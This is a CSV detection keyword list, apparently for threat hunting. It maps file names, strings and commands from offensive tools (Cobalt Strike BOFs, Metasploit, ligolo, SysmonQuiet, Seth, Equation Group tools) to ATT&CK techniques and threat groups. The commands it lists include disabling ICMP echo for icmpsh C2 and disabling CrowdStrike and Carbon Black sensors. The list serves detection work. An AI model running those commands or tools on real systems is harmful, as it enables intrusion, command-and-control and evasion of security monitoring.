T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*synergy_httpx.py*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming 
activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,1,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*Synergy-httpx-main*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,1,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*syscall * out of bounds*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*syscall not permitted:*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*syscall validate failed:*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*syscall_disable_priv *,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,0,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*syscall_enable_priv *,offensive_tool_keyword,cobaltstrike,Syscall BOF to arbitrarily add/detract process token privilege rights.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 
- Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Toggle_Token_Privileges_BOF,1,0,N/A,10,10,49,19,2021-09-14T18:50:42Z,2021-09-14T17:47:08Z -*syscall_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*syscalls.asm*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*syscalls.nim*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,1,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -*syscalls_dump.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_inject 
*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_inject.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_shinject *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_shspawn *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_spawn *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,0,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls_spawn.*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscallsapcspawn.x64*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscalls-asm.h*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*syscallsdump.x64*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscallsinject.x64*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscallsspawn.x64*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*syscallStuff.asm*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*sysctl -w net.ipv4.icmp_echo_ignore_all=1*,greyware_tool_keyword,sysctl,Disable echo reply for icmpsh C2,T1040 - T1095 - T1090.001,TA0010 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/bdamele/icmpsh,1,0,N/A,4,10,1475,424,2018-04-06T17:15:44Z,2011-04-15T10:04:12Z -*sysdream/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*Sysmon is being suffocated*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - 
TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,0,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*Sysmon is quiet now!*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,0,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*sysmonquiet.*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,1,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*SysmonQuiet-main*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,1,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*SySS-Research*,offensive_tool_keyword,Github Username,github repo Open source IT security software tools and information and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SySS-Research,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SySS-Research/Seth*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,1,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*system rm -f /current/tmp/ftshell.latest*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z 
-*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/Aomain Admins*,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*SYSTEM\CurrentControlSet\Services\dcrypt*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*System32fileWritePermissions.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*systemctl disable cbdaemon*,greyware_tool_keyword,systemctl,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*systemctl disable falcon-sensor.service*,greyware_tool_keyword,systemctl,Adversaries may disable security tools to avoid possible detection of their tools and activities. 
